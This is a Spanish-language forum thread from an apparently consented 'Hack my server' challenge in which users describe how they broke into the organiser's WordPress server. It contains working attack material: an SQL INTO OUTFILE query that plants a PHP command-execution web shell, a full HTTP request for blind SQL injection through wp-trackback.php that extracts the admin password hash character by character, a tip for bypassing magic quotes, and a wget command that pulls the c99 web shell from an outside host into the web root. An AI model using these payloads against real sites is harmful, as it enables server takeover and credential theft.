Autor
|
Tema: Hack my server II (Leído 87,189 veces)
|
dRak0
|
dimitrix , saca los permisos ... Danos un poco mas de tiempo. Ando en algo. Dejalo sin permisos.
|
|
« Última modificación: 2 Agosto 2014, 00:43 am por ret2libc »
|
En línea
|
|
|
|
dimitrix
|
dimitrix , saca los permisos ... Danos un poco mas de tiempo. Ando en algo. Dejalo sin permisos.
Tranquilo, sólo puse el WP como tenía que estar, nada más xD De ahí a que escalen...
|
|
|
En línea
|
|
|
|
xustyx
Desconectado
Mensajes: 213
|
Pues a sido un poco lamer por que como esta el phpmyadmin abierto y puediendo meter sql a saco es facil. Nada mas decir que has dado una carpeta con files he pensado en varias y ma dao por buscar la famosa uploads que no existia y de repente lista. Despues desde phpmyadmin he metido la siguiente select: SELECT '<?php if(isset($_REQUEST[\"cmd\"])){ $cmd = ($_REQUEST[\"cmd\"]);system($cmd);die;}?>' INTO OUTFILE '/var/www/wp-content/uploads/c.php'
Lo que hace es crear un fichero php con el siguiente contenido: <?php if(isset($_REQUEST["cmd"])){ $cmd = ($_REQUEST["cmd"]); } ?>
Y nada una cmd, que podria haber sido una c99 codeada o lo que quisiera... pero claro con phpmyadmin abierto y permisos de escritura. Pero bueno antes de que pusieras permisos me tirao un rato intentando colar la libreria UDF pero no ha habido suerte... he creado las funciones base64 y copiado a tmp el lib*.so para despues intentar como pudiese apuntar que la carpeta de plugins de mysql fuera tmp pero nada
|
|
|
En línea
|
|
|
|
WHK
|
Vamos, no era necesario subir una shell para acceder al sistema y ejecutar código, solo con el wordpress como está lo puedes hacer, de hecho nunca fue necesario ponerle un phpmyadmin, bastaba con las mismas fallas del wordpress, al ponerle ses phpmyadmin mataste la emoción.
|
|
|
En línea
|
|
|
|
WHK
|
Que asco dais D: iros de aquí eso no vale ABUSONES!! jajajajaja esque a veces uno se aburre pos xD
|
|
|
En línea
|
|
|
|
xustyx
Desconectado
Mensajes: 213
|
Vamos, no era necesario subir una shell para acceder al sistema y ejecutar código, solo con el wordpress como está lo puedes hacer, de hecho nunca fue necesario ponerle un phpmyadmin, bastaba con las mismas fallas del wordpress, al ponerle ses phpmyadmin mataste la emoción.
Yaps por eso digo... pero si en teoria con las iSql de wordpress tambien se podria haber realizado. (O cualquier cosa que permitiese escribir). PD: Alguien ha sufrido estress despues de utilizar un puto teclao peor que el de una blackberry?
|
|
« Última modificación: 2 Agosto 2014, 01:04 am por xustyx »
|
En línea
|
|
|
|
MinusFour
|
Puff, todo por el SQL xD y yo buscando donde colarme en el wordpress LOL.
|
|
|
En línea
|
|
|
|
dRak0
|
Borra los permisos y la shell. Se va la gracia sino. Igual , aprendi algo nuevo , lo cual era el objetivo de esto.
|
|
|
En línea
|
|
|
|
WHK
|
Estoy obteniendo el hash con la clave del primer usuario de la tabla de usuarios caracter por caracter: POST /wp-trackback.php?p=1 HTTP/1.1 Connection: close Host: web.com Content-Type: application/x-www-form-urlencoded Content-Length: 139
charset=UTF-7&title= -- a&url= -- a&excerpt= -- a&blog_name=a%2bACc-) union select user_pass from wp_users where ID=1 and SUBTRING(user_pass, 1, 1)="a" limit 1 -- -
Luego cambio la letra "a" por "b", c d e f g h i, etc, hasta obtener el hash completo ya que cuando el select está bien muestra un mensaje que dice que el post está duplicado pero cuando hay un error el script continua y aparece un error de sql sobre el insert asi que con substring puedes ir devolviendo verdadero o falso cuando encuentres un carácter válido en el hash de la contraseña, luego a loguearse y luego a ejecutar el código arbitrario o usar la librería de backups vulnerable del wordpress para obtener datos sensibles. PD: php usa magic quotes, por eso no funcionan las inyecciones con comillas, para evadir eso usamos concat() y char().
|
|
|
En línea
|
|
|
|
MinusFour
|
Como evades las magic quotes con concat() y char()??? Creo que es lo único que me haría falta para subir la shell lol.. El servidor tiene el puerto 80 hacia afuera abierto, puedo usar wget. Monte una shell ahí con: wget http://www.c99txt.net/s/c99.txt -P /var/www/wp-content/uploads -O c99.php Así que pues ahí esta la shell en http://web/wp-content/uploads/c99.php. Utilize el script de c.php que habían puesto ahí... y yo se que hubiera sido más fácil si hubiera hecho el query pero así si encuentro como explotar la otra vulnerabilidad no hubiese necesidad de usar el SQL xD.
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Counter Strike 1.5 Hack Server
Juegos y Consolas
|
*StoW*
|
0
|
3,679
|
19 Octubre 2006, 22:22 pm
por *StoW*
|
|
|
Internal Server Error(hack web cross)
WarZone
|
Angbroda
|
5
|
6,399
|
3 Marzo 2009, 17:39 pm
por © Shadoweps ツ
|
|
|
Torneo Hack my Server
« 1 2 ... 6 7 »
Foro Libre
|
dimitrix
|
62
|
23,121
|
1 Agosto 2014, 03:04 am
por dimitrix
|
|
|
Hack My Server III
« 1 2 »
Foro Libre
|
dimitrix
|
16
|
6,636
|
30 Marzo 2015, 18:47 pm
por elmatador2
|
|
|
Hack my server 2018
« 1 2 »
Hacking
|
dimitrix
|
16
|
19,762
|
28 Mayo 2018, 22:06 pm
por hitori batusai
|
|